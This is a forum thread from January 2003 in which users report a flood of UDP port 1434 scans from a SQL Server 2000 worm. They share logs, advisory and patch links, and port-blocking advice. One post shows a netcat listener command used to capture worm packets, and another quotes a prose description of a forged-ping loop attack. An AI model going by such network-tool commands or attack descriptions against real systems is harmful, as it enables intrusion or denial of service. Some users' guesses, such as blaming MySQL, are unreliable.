»www.nextgenss.com/advisories/mssql-udp.txt]]> http://www.dslreports.com/forum/remark,5773055 Sat, 25 Jan 2003 04:30:03 EDT http://www.dslreports.com/forum/remark,5773053 ircgeeks : i am getting killed it even took down the DNS of one of my co located server's i am on the phone with there netadmin now and he is trying to download the patches and service packs at home so he can burn them and drive to the co lo to install them
--
-- "I feel sorry for people who don't drink. When they wake up in the morning, that's as good as they're going to feel all day." - Frank Sinatra]]> http://www.dslreports.com/forum/remark,5773053 Sat, 25 Jan 2003 04:29:53 EDT http://www.dslreports.com/forum/remark,5773049 mrp31984 : Just turned my log back on and have already been hit three times in less than five minutes. Looks like we're in for one hell of a time.]]> http://www.dslreports.com/forum/remark,5773049 Sat, 25 Jan 2003 04:27:52 EDT http://www.dslreports.com/forum/remark,5773048 robre : HP.com hit: vcsolap2.vcd.hp.com

I hope that this a new one. The others are 6 months old +]]> http://www.dslreports.com/forum/remark,5773048 Sat, 25 Jan 2003 04:27:20 EDT http://www.dslreports.com/forum/remark,5773034 BOFH5 : LINK

»www.microsoft.com/technet/securi···-039.asp]]> http://www.dslreports.com/forum/remark,5773034 Sat, 25 Jan 2003 04:22:14 EDT http://www.dslreports.com/forum/remark,5773032 InGd : port 4662 I believe is normally used by the edonkey p2p client or server, if you use this then traffic on that port is normal after closing the app, if you don't use it but do have a dynamic ip you might have just gotten the ip of someone else who uses it. in any case I'd try to ditch the ip as soon as possible if you can, when I first got the ip I've got now (sept,2001) I guess the person who had it before me ran a edonkey client server, and to put it lightly I recieved about 50,000 hits minimum per day on ports 4662 tcp and 4665 udp for the first 3 months, my router logs were about 250mb's weekly lol]]> http://www.dslreports.com/forum/remark,5773032 Sat, 25 Jan 2003 04:21:49 EDT http://www.dslreports.com/forum/remark,5773030 Link Logger : Its included in SP3

»www.microsoft.com/sql/downloads/2000/sp3.asp

Blake]]> http://www.dslreports.com/forum/remark,5773030 Sat, 25 Jan 2003 04:21:34 EDT http://www.dslreports.com/forum/remark,5773023 ircgeeks : Dose anyone have the link to the ms hot fix for this?]]> http://www.dslreports.com/forum/remark,5773023 Sat, 25 Jan 2003 04:20:02 EDT http://www.dslreports.com/forum/remark,5773022 halfempty : Not getting anything on 4662, but have a handful on 1433 in addition to all the 1434's.]]> http://www.dslreports.com/forum/remark,5773022 Sat, 25 Jan 2003 04:19:24 EDT http://www.dslreports.com/forum/remark,5773020 Telly Boot :

said by TeenTech$ :

---

Port 4662 is for EDONKEY2000

---

The RIAA strikes back !
--
Take my advice, I'm not using it!]]> http://www.dslreports.com/forum/remark,5773020 Sat, 25 Jan 2003 04:19:17 EDT http://www.dslreports.com/forum/remark,5773007 TeenTech$ : foxsteve

Port 4662 is for EDONKEY2000

»www.seifried.org/security/ports/···662.html]]> http://www.dslreports.com/forum/remark,5773007 Sat, 25 Jan 2003 04:15:56 EDT http://www.dslreports.com/forum/remark,5772999 anon : deleted by a moderator]]> http://www.dslreports.com/forum/remark,5772999 Sat, 25 Jan 2003 04:14:12 EDT http://www.dslreports.com/forum/remark,5772993 Tuulilapsi : I've seen 5 of these scans in the last 30 or so minutes, mostly from the United Kingdom. It's not affecting my connection at all, really, but it's interesting to see how it develops.
--
Mors Principium Est.]]> http://www.dslreports.com/forum/remark,5772993 Sat, 25 Jan 2003 04:13:40 EDT http://www.dslreports.com/forum/remark,5772991 robre : I'm guessing it's set up to DDOS something, probably UUNET judging by »www.internetpulse.net/ and UUNET.com is down.]]> http://www.dslreports.com/forum/remark,5772991 Sat, 25 Jan 2003 04:12:15 EDT http://www.dslreports.com/forum/remark,5772984 Marilla :

said by pin87a :

---

According to Microsoft the fix for this vulnerability will be included included in SQL Server 2000 Service Pack 3.(it isn't in Service Pack 2)

---

Ugh. SP3 came out last week, and I'd not even heard of it until today.

Sucks to be me.]]> http://www.dslreports.com/forum/remark,5772984 Sat, 25 Jan 2003 04:10:46 EDT http://www.dslreports.com/forum/remark,5772974 pin87a :

said by Marilla :

---

---

Couple questions:

1) Do we KNOW that it is related to the vulnerability noted at the start of this thread, or is that simply assumed because that is information currently available concerning a vulnerability that targets port 1434 on servers running SQL Server?

2) Wouldn't SP2 (which came out end of November or maybe October, I think?) have included this fix? I sure hope I've not been wrong in assuming that service packs contain all previous hotfixes like that, because when I install new, I simply install the latest SP, and any hotfixes since then I can find..

---

We don't know for sure that this is that exact vulnerability, but it is looking like it most likely is.
(so we are assuming)

According to Microsoft the fix for this vulnerability will be included included in SQL Server 2000 Service Pack 3.(it isn't in Service Pack 2)
[text was edited by author 2003-01-25 04:07:14]
]]> http://www.dslreports.com/forum/remark,5772974 Sat, 25 Jan 2003 04:06:18 EDT http://www.dslreports.com/forum/remark,5772945 Link Logger : I have not seen any traffic on TCP 4662 here yet. Oddly enough I am seeing an increase for inbound TCP port 80 traffic (when compared to the last couple of days).

Opps limited tools on the server running the logging stuff, sorry.

Blake
[text was edited by author 2003-01-25 04:01:18]

[text was edited by author 2003-01-25 04:02:19]

]]> http://www.dslreports.com/forum/remark,5772945 Sat, 25 Jan 2003 03:59:03 EDT http://www.dslreports.com/forum/remark,5772943 anon : why doesn't MS include these type of patches in with critical updates so updating automatically you will grab them and install right when the patch is released... just a thought. ;~)]]> http://www.dslreports.com/forum/remark,5772943 Sat, 25 Jan 2003 03:58:30 EDT http://www.dslreports.com/forum/remark,5772934 Marilla :

said by pin87a :

---

Microsoft patched this vulnerability last July. It is not their fault lazy sysadmins failed to patch their servers.

---

Couple questions:

1) Do we KNOW that it is related to the vulnerability noted at the start of this thread, or is that simply assumed because that is information currently available concerning a vulnerability that targets port 1434 on servers running SQL Server?

2) Wouldn't SP2 (which came out end of November or maybe October, I think?) have included this fix? I sure hope I've not been wrong in assuming that service packs contain all previous hotfixes like that, because when I install new, I simply install the latest SP, and any hotfixes since then I can find..]]> http://www.dslreports.com/forum/remark,5772934 Sat, 25 Jan 2003 03:56:17 EDT http://www.dslreports.com/forum/remark,5772930 Mark : Also, I do not believe this is a worm, there is no payload, no binary. It just uses a flaw in mySQL server to propagate, which also causes the denial of service effect.

quote:

---

In addition to providing referrals, the SSRS is capable of replying to "ping" messages from other SQL servers to confirm its presence on a network. When the service receives such a message, it replies to the transmitting host with an identical reply message. In normal operation, the SSRS service is responsible for replying to ping messages sent by an SQL Server and does not initiate them. However, an attacker can create a forged ping message to one instance of the SSRS (Victim A, port 1434) that appears to originate from another instance (Victim B, port 1434), causing Victim A and Victim B to continuously exchange messages. This cycle will continue to consume server and network resources until one of the servers stops sending packets for one of several reasons, including a restart of the SQL Server, a reboot of the server host, or a network failure.

---

I think whats happened is that someone created a program that sends these 'triggers' to a range of hosts, which in turn makes them do the same until they are rebooted/crash, and are 're taken over' by this flaw.]]> http://www.dslreports.com/forum/remark,5772930 Sat, 25 Jan 2003 03:55:15 EDT http://www.dslreports.com/forum/remark,5772926 pin87a :

said by SxTX :

---

I love this !!! Microsoft sucks so bad Every OS and server application has multiple vulnerabilities. Microsofts weak security took me out of business due to DDOS attacks. I hope this one teaches them a lesson.

---

Microsoft patched this vulnerability last July. It is not their fault lazy sysadmins failed to patch their servers.]]> http://www.dslreports.com/forum/remark,5772926 Sat, 25 Jan 2003 03:52:53 EDT http://www.dslreports.com/forum/remark,5772919 anon : Do you have a url to the nanog reports? I'd very much like to see them.]]> http://www.dslreports.com/forum/remark,5772919 Sat, 25 Jan 2003 03:52:24 EDT http://www.dslreports.com/forum/remark,5772910 foxsteve : Who has attacks on two ports 1434/udp and 4662/tcp? I have. Attempt on port 4662 every 3 -10 s
[text was edited by author 2003-01-25 03:55:27]
]]> http://www.dslreports.com/forum/remark,5772910 Sat, 25 Jan 2003 03:50:00 EDT http://www.dslreports.com/forum/remark,5772903 SxTX : I love this !!! Microsoft sucks so bad Every OS and server application has multiple vulnerabilities. Microsofts weak security took me out of business due to DDOS attacks. I hope this one teaches them a lesson.]]> http://www.dslreports.com/forum/remark,5772903 Sat, 25 Jan 2003 03:47:37 EDT http://www.dslreports.com/forum/remark,5772899 Mark : Yea, Code Red/Nimda used hit port 80 (httpd)


Fortunately, not many customers will care if udp port 1434 is blocked outgoing and incoming temporarily. I think it would be prudent of all isp's to do so, at least until this dies down.
[text was edited by author 2003-01-25 03:47:24]
]]> http://www.dslreports.com/forum/remark,5772899 Sat, 25 Jan 2003 03:46:36 EDT http://www.dslreports.com/forum/remark,5772896 Marilla :

said by InGd :

---

My isp never blocked any ports when code red was going around.... but maybe that was because it was hitting port 80? (can't 100% remember what port code red hit)

---

Code Red hit port 80, yes.]]> http://www.dslreports.com/forum/remark,5772896 Sat, 25 Jan 2003 03:46:06 EDT http://www.dslreports.com/forum/remark,5772893 Mark : My ISP (Verizon, or maybe my backbone, Genuity) must already be filtering it, I haven't got a single attempt since the first 2 I received 30 minutes or so ago.

Edit: NM, got another one.
[text was edited by author 2003-01-25 03:56:35]
]]> http://www.dslreports.com/forum/remark,5772893 Sat, 25 Jan 2003 03:45:11 EDT http://www.dslreports.com/forum/remark,5772892 Marilla : Well, seems my port 1434 udp is wide open on the server I referenced earlier... however, assuming the vulnerability is among the ones noted, I think I'm fine... as I believe fixes for those were included in SP2 for SQL Server. I'm hoping, anyway...]]> http://www.dslreports.com/forum/remark,5772892 Sat, 25 Jan 2003 03:45:09 EDT http://www.dslreports.com/forum/remark,5772890 InGd : wow I think this actually is pretty serious, I stopped getting hits on port 1434 an hour ago, which I assume means my isp blocked it at their end, either that or maybe I'm just fluking out and haven't got any hits. My isp never blocked any ports when code red was going around.... but maybe that was because it was hitting port 80? (can't 100% remember what port code red hit)]]> http://www.dslreports.com/forum/remark,5772890 Sat, 25 Jan 2003 03:44:40 EDT http://www.dslreports.com/forum/remark,5772842 AmeritecTech : »www.kb.cert.org/vuls/id/370308]]> http://www.dslreports.com/forum/remark,5772842 Sat, 25 Jan 2003 03:36:14 EDT http://www.dslreports.com/forum/remark,5772819 Mark : »average.matrix.net/
Look at the reachability level's in the past hour or so.

Blocking all outgoing/incoming 1434 udp would be a very good idea right now. We need to stop any further spread and minimize the damages current infected hosts can cause.]]> http://www.dslreports.com/forum/remark,5772819 Sat, 25 Jan 2003 03:31:44 EDT http://www.dslreports.com/forum/remark,5772800 woodward : I've been told that two of our backbone providers are now blocking this port. NANOG is getting some interesting reports.

Please spread the word about what this is. It's easy to stop on the host/ISP level with a simple filter of port 1434.]]> http://www.dslreports.com/forum/remark,5772800 Sat, 25 Jan 2003 03:26:12 EDT http://www.dslreports.com/forum/remark,5772794 inTulsa : I'm getting many hits on it originating from all over the world, lots from Asia/Pacific. But last hour they seem to be quieting down. Pictured is a little 25K free honeypot if anyone wants to watch them as they arrive: »www.bttsoftware.co.uk/ipspy.html
[text was edited by author 2003-01-25 03:44:45]

]]> http://www.dslreports.com/forum/remark,5772794 Sat, 25 Jan 2003 03:25:11 EDT http://www.dslreports.com/forum/remark,5772793 anon : At 10:00 pm our entire network at work lit up. We slowly took down each switch until we narrowed the acitvity down to one of our servers. On this system SQL2k was at 60% cpu usage.

We killed the nic on that system and after a couple seconds (15 or 20) SQL2k cpu usage dropped to 0% as was usual for that hour.

We've since cut our offices off from the internet and everything is disocnnected and alls ervers shut down. Tomorrow we will be making sure everything is up to date. I just wanted to verify that one of our sql servers saturated our lan and killed our internet connection.

Hope that helps.
]]> http://www.dslreports.com/forum/remark,5772793 Sat, 25 Jan 2003 03:24:57 EDT http://www.dslreports.com/forum/remark,5772787 Mark : nc.exe -l -u -p 1434 > C:\worm.txt

*waits*]]> http://www.dslreports.com/forum/remark,5772787 Sat, 25 Jan 2003 03:24:18 EDT http://www.dslreports.com/forum/remark,5772772 foxsteve : Who has attacks on two ports 1434 and 4662?]]> http://www.dslreports.com/forum/remark,5772772 Sat, 25 Jan 2003 03:22:03 EDT http://www.dslreports.com/forum/remark,5772759 asn9 : suxors, just suxors
[text was edited by author 2003-01-25 03:22:55]

]]> http://www.dslreports.com/forum/remark,5772759 Sat, 25 Jan 2003 03:18:58 EDT http://www.dslreports.com/forum/remark,5772723 FutureMon : Just a note:

This apparently affects ONLY SQL Server 2000, not SQL Server 6.5 or 7. At least the Article said that this UDP Functionality was introduced with SQL 2000 and made no mention upon a glance of the other versions being affected.

- FM
--
DCExec Member, Member of 'StarFire Seven' & Undisputed BBR Karaoke Champion!]]> http://www.dslreports.com/forum/remark,5772723 Sat, 25 Jan 2003 03:07:08 EDT http://www.dslreports.com/forum/remark,5772719 foxsteve : Attack on my PC port 1434 is continued.
BTW, the attempts to penetrate through port 4662 are more seldom.
[text was edited by author 2003-01-25 03:13:35]
]]> http://www.dslreports.com/forum/remark,5772719 Sat, 25 Jan 2003 03:06:04 EDT http://www.dslreports.com/forum/remark,5772698 anon : I'm running at 1 every 20-30 seconds at the moment.]]> http://www.dslreports.com/forum/remark,5772698 Sat, 25 Jan 2003 03:01:20 EDT http://www.dslreports.com/forum/remark,5772688 Link Logger : I'm betting this is using the Heap Buffer Overflow attack which was announced on July 25, 2002 and a patch was released the same day, but then again who patches, even after Code Red and Nimda.

»www.kb.cert.org/vuls/id/399260
»www.microsoft.com/technet/treevi···-039.asp

This is only a guess at this time as I mentioned I'm at the end of a development cycle so all my systems are either developing or testing (good testing) so I can't honeypot this.

Blake]]> http://www.dslreports.com/forum/remark,5772688 Sat, 25 Jan 2003 02:59:09 EDT http://www.dslreports.com/forum/remark,5772683 Mark : Only got 2 hits so far, both before I ran netcat :[ I want to see what this thing does.]]> http://www.dslreports.com/forum/remark,5772683 Sat, 25 Jan 2003 02:58:29 EDT http://www.dslreports.com/forum/remark,5772681 Marilla : If I'm not mistaken, this is yet another case of clueless admins not patching their servers, or following other best practices.

For one thing, I imagine 99% of the SQL Server installations out there have NO use for the Monitor service at all; it's only useful when you have multiple instances of SQL Server running and something making a connection might not know the ports to connect to them all.

I'm still trying to make 100% sure but in my case, for instance, I'm fairly sure the server I have will not be affected by this (although it seems that many others hosted by the same company ARE) because I'm fairly sure I turned the monitor service off because it served no purpose for me... PLUS, I from the default port SQL server uses to connect anyway.]]> http://www.dslreports.com/forum/remark,5772681 Sat, 25 Jan 2003 02:58:19 EDT http://www.dslreports.com/forum/remark,5772674 anon : Yea, hah! I hope someone on one of the main news sites puts an article up to explain to the people who don't know about computers what's going on.]]> http://www.dslreports.com/forum/remark,5772674 Sat, 25 Jan 2003 02:56:42 EDT http://www.dslreports.com/forum/remark,5772670 InGd : heh damn you people are on this stuff fast, I just noticed about an hour ago I was getting hits on port 1434 and wasn't too sure whether I had a trojan or something because I was playing around with file sharing (NETBIOS) with no firewall earlier today. But it's good to know it's not me :)]]> http://www.dslreports.com/forum/remark,5772670 Sat, 25 Jan 2003 02:55:44 EDT http://www.dslreports.com/forum/remark,5772659 anon : ...and yesterday I got a email from MS explaining what it was doing about about security. Great timing.]]> http://www.dslreports.com/forum/remark,5772659 Sat, 25 Jan 2003 02:54:35 EDT http://www.dslreports.com/forum/remark,5772652 anon : Wow I sure am glad I'm running MySQL on Mac OS X.
I can't wait to hear the crap MS is going to get tomorrow...]]> http://www.dslreports.com/forum/remark,5772652 Sat, 25 Jan 2003 02:52:18 EDT http://www.dslreports.com/forum/remark,5772651 Craig3281$ : My connection is down, my ISP in Miami is down, my host in Michigan is down and can barely connect on dial-up.
--
Halbert Associates - Looking for a Web Developer?]]> http://www.dslreports.com/forum/remark,5772651 Sat, 25 Jan 2003 02:52:02 EDT http://www.dslreports.com/forum/remark,5772637 chpalmer : Glad to see Im not alone!! Ive been hit about 200 times since it started...]]> http://www.dslreports.com/forum/remark,5772637 Sat, 25 Jan 2003 02:49:19 EDT http://www.dslreports.com/forum/remark,5772636 Marilla : Okay.. so.. question:

I have a server co-located somewhere with SQL Server on it. I'm not 100% sure, but I believe I am patched for this.. if anyone knows, was the patch(es) for this included in SQL2000 SP2?

At any rate, another thing: The default port to connect to SQL server is 1433, and then the monitor server port is 1434. If I'm not mistaken, it's possible to remove/disable the monitor service so that the server will NOT enumerate instances of SQL Server running? I recall such an option, and I recall doing it... is that what this is that runs on 1434?

Also, though, I have changed the port by which connections are made to that instance of SQL server itself to something other than 1433... if the Monitor service is not what I'm thinking... well.. err.. hehe.

Just a bit worried.. and since I can't connect to the thing at all to see... I dunno!]]> http://www.dslreports.com/forum/remark,5772636 Sat, 25 Jan 2003 02:49:07 EDT http://www.dslreports.com/forum/remark,5772622 anon : adding a filter to deny on that port wouldn't be a back idea. I just checked my logs and noticed some attempts on my system on UDP 1434.

Nice quick info here ;~) thx ]]> http://www.dslreports.com/forum/remark,5772622 Sat, 25 Jan 2003 02:46:35 EDT http://www.dslreports.com/forum/remark,5772612 Mark : From what I'm hearing, it's a bigger, nastier code red/nimda that infects mySQL instead of IIS.]]> http://www.dslreports.com/forum/remark,5772612 Sat, 25 Jan 2003 02:45:06 EDT http://www.dslreports.com/forum/remark,5772609 Rockster : Got my first hit on that port over two hours ago and so far have had around 150!

That maxed out my alert window (500) and I've only been online 10 hours.]]> http://www.dslreports.com/forum/remark,5772609 Sat, 25 Jan 2003 02:44:51 EDT http://www.dslreports.com/forum/remark,5772603 PDXracer : I cannot connect to ANY sites east of Chicago (I am in portland oregon)

Everything trying to route through texas, then timing out.

Can only get west coast based sites, and those are very slow loading right now.

Something big is happening]]> http://www.dslreports.com/forum/remark,5772603 Sat, 25 Jan 2003 02:43:38 EDT http://www.dslreports.com/forum/remark,5772599 Mark : Set up a honeypot, will get back with hexdumps, I've only got 2 so far ;)]]> http://www.dslreports.com/forum/remark,5772599 Sat, 25 Jan 2003 02:42:59 EDT http://www.dslreports.com/forum/remark,5772572 anon : Saturday, January 25, 2003 2:27:32 AM Unrecognized access from 203.99.141.28:3061 to UDP port 1434
Saturday, January 25, 2003 2:28:12 AM Unrecognized access from 209.242.56.66:3334 to UDP port 1434
Saturday, January 25, 2003 2:28:29 AM Unrecognized access from 210.166.4.163:3377 to UDP port 1434
Saturday, January 25, 2003 2:29:57 AM Unrecognized access from 217.7.129.10:3259 to UDP port 1434
Saturday, January 25, 2003 2:34:09 AM Unrecognized access from 130.88.96.33:3367 to UDP port 1434
Saturday, January 25, 2003 2:35:01 AM Unrecognized access from 153.91.41.24:1039 to UDP port 1434
Saturday, January 25, 2003 2:35:05 AM Unrecognized access from 216.120.45.155:2020 to UDP port 1434
Saturday, January 25, 2003 2:35:51 AM Unrecognized access from 213.160.64.52:1168 to UDP port 1434
Saturday, January 25, 2003 2:37:59 AM Unrecognized access from 198.64.129.159:3976 to UDP port 1434
]]> http://www.dslreports.com/forum/remark,5772572 Sat, 25 Jan 2003 02:37:26 EDT http://www.dslreports.com/forum/remark,5772557 anon : Just curious and a littel off topic, but I'm running the R1.95j router firmware. Am I right that doing a...

>> Packet Filter
>> Inbound
>> Deny Everything

...should help, or do I really have no idea what I'm talking about ? ;-) How do you just say, all 1434 ignore ? Or doe the fact that the log says unrecognised mean it's already ignoring them ?

Many thanks from a panic station. :-)]]> http://www.dslreports.com/forum/remark,5772557 Sat, 25 Jan 2003 02:35:11 EDT http://www.dslreports.com/forum/remark,5772547 Bchinch00 : Here is a log of about the last 2 minutes. Seems i am also getting hits on this port!

]]> http://www.dslreports.com/forum/remark,5772547 Sat, 25 Jan 2003 02:34:08 EDT http://www.dslreports.com/forum/remark,5772513 abaez : If you don't have mysql you probably don't have to worry about getting infected. But the worm is wreaking havoc on everything. I ping 1000+ to almost every ip I try and my friends are the same.]]> http://www.dslreports.com/forum/remark,5772513 Sat, 25 Jan 2003 02:30:28 EDT http://www.dslreports.com/forum/remark,5772493 anon : Jeez I'm glad it's not just me, I was starting to get paranoid til I came here.

So, if you don't have sql server does this mean there is nothing to worry about.

if not, what's the best solution. Watch them all bounce off the router and firewall software, or should people be doing something more active.]]> http://www.dslreports.com/forum/remark,5772493 Sat, 25 Jan 2003 02:28:16 EDT http://www.dslreports.com/forum/remark,5772389 anon : deleted by a moderator]]> http://www.dslreports.com/forum/remark,5772389 Sat, 25 Jan 2003 02:12:14 EDT http://www.dslreports.com/forum/remark,5772358 woodward :

quote:

---

... a virtual mini-DDoS

---

Nothing "mini" about it on our end. :)

I do not administer these servers (these are colocations). If this is an old exploit, hasn't M$ SQL's server been patched to cover it?

Or was that just a silly question....]]> http://www.dslreports.com/forum/remark,5772358 Sat, 25 Jan 2003 02:07:37 EDT http://www.dslreports.com/forum/remark,5772338 gwion : See my follow up to a post in Verizon at »How slow can my connection actualy get? ... carnage here was massive, reduced my typically 733+/133 connection to 688 and 78, on my worst speed test... I'm seeing mostly Asia and Europe, so far, myself, though everything's mixed in there... did some "brain surgery with a hatchet" and blackholed everything incoming, and I'm back to speed, now, but this is ridiculous... a virtual mini-DDoS...
--
"Anger makes dull men witty, but it keeps them poor."
Elizabeth I, in Francis Bacon, Apophthegms, 1625 ]]> http://www.dslreports.com/forum/remark,5772338 Sat, 25 Jan 2003 02:04:32 EDT http://www.dslreports.com/forum/remark,5772325 woodward : All at once this one invaded our colocation facility and infected most every IIS ans MS SQL server in there. DoS'd us right off the internet with about 80 GB of data within minutes until we blocked the port at the border and yanked a few cords.

This one could be really nasty.]]> http://www.dslreports.com/forum/remark,5772325 Sat, 25 Jan 2003 02:01:51 EDT http://www.dslreports.com/forum/remark,5772214 sammysnake : In a hour and 10 minuets I have been hit 62 times and it keeps on growing. :(

]]> http://www.dslreports.com/forum/remark,5772214 Sat, 25 Jan 2003 01:46:15 EDT http://www.dslreports.com/forum/remark,5772151 sammysnake : A lot of the offending IP's are from the .edu domain but spread all over the place according to what ZoneLog is telling me from the hits I've been getting.

Sammy :(]]> http://www.dslreports.com/forum/remark,5772151 Sat, 25 Jan 2003 01:34:33 EDT http://www.dslreports.com/forum/remark,5772118 fatal : same here :( ]]> http://www.dslreports.com/forum/remark,5772118 Sat, 25 Jan 2003 01:28:09 EDT http://www.dslreports.com/forum/remark,5772077 Link Logger : I am at the tail end of a development cycle so I'm out of the game for anything other then noticing this. If anyone has a honeypot, tune it to UDP port 1434 and see what is happening. Seems to be spreading rather quickly. Seems to have an across the board random IP generator as I only see single hits from any one system (unlike Code Red which used a weighted IP generation algo).

Blake]]> http://www.dslreports.com/forum/remark,5772077 Sat, 25 Jan 2003 01:21:29 EDT http://www.dslreports.com/forum/remark,5772023 RadRick : yep me too, started right at 11:31pm central]]> http://www.dslreports.com/forum/remark,5772023 Sat, 25 Jan 2003 01:12:49 EDT http://www.dslreports.com/forum/remark,5771998 sammysnake : Ditto... I've been hit over 20 times in the past 15 minutes on the same port.

Sammy :(]]> http://www.dslreports.com/forum/remark,5771998 Sat, 25 Jan 2003 01:10:03 EDT http://www.dslreports.com/forum/remark,5771992 jmvolfan3 : From my Linksys logs I am also getting the same thing tonight. Over the last 10 minutes, the # of IP's has grown to 20. ]]> http://www.dslreports.com/forum/remark,5771992 Sat, 25 Jan 2003 01:09:38 EDT http://www.dslreports.com/forum/remark,5771984 No Name5 : Yes I thought it was just me about 30 minutes ago got same thing. Rarely see much activity on Qwest vdsl. Every minute or so. Started around 10:33pm AZ time all remote IPs are different.


[text was edited by author 2003-01-25 01:18:32]
]]> http://www.dslreports.com/forum/remark,5771984 Sat, 25 Jan 2003 01:08:48 EDT http://www.dslreports.com/forum/remark,5771929 Link Logger : I have just starting getting bombed with port scans to UDP port 1434 which is the SQL Server Monitor service. There are known vuls against this port so it looks like some is attacking on it and built a worm for it.

»www.kb.cert.org/vuls/id/370308
»www.kb.cert.org/vuls/id/399260
»www.kb.cert.org/vuls/id/484891

Anyone else seeing this traffic. It started here about 30 minutes ago.

Blake
»www.LinkLogger.com
»www.SonicLogger.com
[text was edited by author 2003-01-25 02:41:31]]]> http://www.dslreports.com/forum/remark,5771929 Sat, 25 Jan 2003 01:01:26 EDT